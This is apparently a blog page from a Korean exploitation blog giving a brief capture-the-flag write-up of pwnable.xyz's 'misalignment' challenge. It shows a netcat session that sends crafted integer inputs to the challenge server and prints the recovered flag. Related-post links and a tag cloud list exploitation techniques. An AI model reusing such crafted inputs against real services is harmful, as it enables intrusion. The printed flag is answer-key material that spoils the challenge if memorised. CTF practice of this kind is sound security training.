History view
binary@ubuntu:~/pwnable.xyz/misalignment$ nc svc.pwnable.xyz 30003
0
-5404319552844595200
-6
Result: -5404319552844595200
0
184549376
-5
Result: 184549376
a
FLAG{u_cheater_used_a_debugger}
'Pwning in Linux' 카테고리의 다른 글
Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
---|---|
Exploit - Note pwnable.xyz (0) | 2019.03.01 |
Exploit - GrownUp pwnable.xyz (0) | 2019.03.01 |
Trigger return NULL value in Malloc (0) | 2019.02.28 |
Brainfuck - GOT Dereferencing / Overwriting, ASLR/NX Bypass (0) | 2019.02.28 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- stack pivot
- html injection
- canary
- pwnable.tw
- format string
- 32Bit
- XSS
- ASM
- pwnable.xyz
- theFaunia course
- dnspy
- Backdoors
- write primitive
- Windows
- x64dbg
- fake stack frame
- cracking
- leak libc
- arithmetic overflow/underflow
- GOT Dereferencing/Overwriting
- leak stack memory address
- shellcode
- use after free
- one gadget
- Call oriented programming
- hijacking redirection flow
- return oriented programming
- buffer overflow
- Pwnable.kr
- open-redirect
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 |
Archives